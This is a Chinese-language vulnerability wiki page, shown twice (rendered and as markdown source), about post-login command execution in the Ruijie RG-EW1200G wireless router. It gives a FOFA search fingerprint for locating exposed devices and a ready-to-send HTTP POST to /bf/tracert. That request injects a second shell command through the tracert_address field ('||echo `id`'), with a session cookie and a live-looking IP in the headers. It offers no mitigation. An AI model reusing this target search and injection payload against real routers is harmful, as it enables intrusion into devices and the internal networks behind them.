fofamini-wiki

登录白背景

源码

锐捷RG-EW1200G路由器后台命令执行

一、漏洞简介

锐捷网络RG-EW1200G 存在后台命令执行漏洞，登录路由器后，可执行任意命令，控制内部网络

二、影响版本

RG-EW1200G无线路由器

三、资产测绘

body="/static/js/app.09df2a9e44ab48766f5f.js"

登录页面

四、漏洞复现

POST /bf/tracert HTTP/1.1
Host: 
Content-Length: 53
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://175.167.44.37:6060
Referer: http://175.167.44.37:6060/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cda05348636f998dddeff1d3f3fe1fc8d87ed86b4b4818536
Connection: close

{"tracert_address":"||echo `id`","is_first_req":true}

![]()

原文: https://www.yuque.com/xiaokp7/ocvun2/vmp57vmo35od9v3c

# 锐捷RG-EW1200G路由器后台命令执行

# 一、漏洞简介
锐捷网络RG-EW1200G 存在后台命令执行漏洞，登录路由器后，可执行任意命令，控制内部网络

# 二、影响版本
+ RG-EW1200G无线路由器

# 三、资产测绘
```plain
body="/static/js/app.09df2a9e44ab48766f5f.js"
```

![1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05.png](./img/T47hLu2WF7iLYEL_/1711861011537-b26157a8-4ea8-4b53-9e61-798dd6a3cb05-203577.png)

+ 登录页面

![1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0.png](./img/T47hLu2WF7iLYEL_/1711860999021-84f63469-af01-48b1-8a8f-5d94d53d0fd0-986478.png)

# 四、漏洞复现
```plain
POST /bf/tracert HTTP/1.1
Host: 
Content-Length: 53
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://175.167.44.37:6060
Referer: http://175.167.44.37:6060/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cda05348636f998dddeff1d3f3fe1fc8d87ed86b4b4818536
Connection: close

{"tracert_address":"||echo `id`","is_first_req":true}
```